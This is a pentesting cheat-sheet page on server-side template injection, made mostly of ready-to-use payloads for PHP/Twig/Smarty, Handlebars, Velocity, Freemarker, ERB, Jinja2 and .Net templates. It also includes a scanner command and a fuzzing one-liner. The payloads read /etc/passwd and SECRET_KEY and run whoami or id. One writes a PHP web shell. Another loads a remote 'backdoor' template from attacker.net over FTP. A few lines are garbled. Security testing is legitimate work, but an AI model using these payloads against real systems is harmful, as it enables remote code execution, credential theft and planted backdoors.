SSTI - Pentest Book

1
# Tool
2
# https://github.com/epinna/tplmap
3
tplmap.py -u 'http://www.target.com/page?name=John'
4
​
5
# Payloads
6
# https://github.com/payloadbox/ssti-payloads
7
​
8
# Oneliner
9
# Check SSTI in all param with qsreplace
10
waybackurls http://target.com | qsreplace "ssti{{9*9}}" > fuzz.txt
11
ffuf -u FUZZ -w fuzz.txt -replay-proxy http://127.0.0.1:8080/
12
# Check in burp for reponses with ssti81
13
​
14
# Generic
15
${{<%[%'"}}%\.
16
{% debug %}
17
{7*7}
18
{{ '7'*7 }}
19
{{ [] .class.base.subclassesO }}
20
{{''.class.mro()[l] .subclassesO}}
21
for c in [1,2,3] %}{{ c,c,c }}{% endfor %}
22
{{ [].__class__.__base__.__subclasses__O }}
23
​
24
# PHP Based
25
{php}print "Hello"{/php}
26
{php}$s = file_get_contents('/etc/passwd',NULL, NULL, 0, 100); var_dump($s);{/php}
27
{{7*7}}
28
{{7*'7'}}
29
{{dump(app)}}
30
{{app.request.server.all|join(',')}}
31
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
32
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
33
{$smarty.version}
34
{php}echo `id`;{/php}
35
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
36
​
37
# Node.js Backend based 
38
{{ this }}-> [Object Object]
39
{{ this.__proto__ }}-> [Object Object]
40
{{ this.__proto__.constructor.name }}-> Object
41
{{this.constructor.constructor}}
42
{{this. constructor. constructor('process.pid')()}}
43
{{#with "e"}}
44
{{#with split as |conslist|}}
45
{{this.pop}}
46
{{this.push (lookup string.sub "constructor")}}
47
{{this.pop}}
48
{{#with string.split as |codelist|}}
49
{{this.pop}}
50
{{this.push "return require('child_process').exec('whoami');"}}
51
{{this.pop}}
52
{{#each conslist}}
53
{{#with (string.sub.apply 0 codelist)}}
54
{{this}}
55
{{/with}}
56
{{/each}}
57
#set($str=$class.inspect("java.lang.String").type)
58
#set($chr=$class.inspect("java.lang.Character").type)
59
#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami"))
60
$ex.waitFor()
61
#set($out=$ex.getInputStream())
62
#foreach($i in [1..$out.available()])
63
$str.valueOf($chr.toChars($out.read()))
64
#end
65
​
66
# Java
67
${7*7}
68
<#assign command="freemarker.template.utility.Execute"?new()> ${ command("cat /etc/passwd") }
69
${{7*7}}
70
${class.getClassLoader()}
71
${class.getResource("").getPath()}
72
${class.getResource("../../../../../index.htm").getContent()}
73
${T(java.lang.System).getenv()}
74
${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('/etc/passwd').toURL().openStream().readAllBytes()?join(" ")}
75
​
76
# Ruby
77
<%= system("whoami") %>
78
<%= Dir.entries('/') %>
79
<%= File.open('/example/arbitrary-file').read %>
80
​
81
# Python
82
{% debug %}
83
{{settings.SECRET_KEY}}
84
{% import foobar %} = Error
85
{% import os %}{{os.system('whoami')}}
86
​
87
# Perl
88
<%= perl code %>
89
<% perl code %>
90
​
91
# Flask/Jinja2
92
{{ '7'*7 }}
93
{{ [].class.base.subclasses() }} # get all classes
94
{{''.class.mro()[1].subclasses()}}
95
{%for c in [1,2,3] %}{{c,c,c}}{% endfor %}
96
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
97
​
98
# .Net
99
@(1+2)
100
@{// C# code}
Copied!

HTTP Parameter pollution

Prototype Pollution

Last modified 9mo ago

Export as PDF

Copy link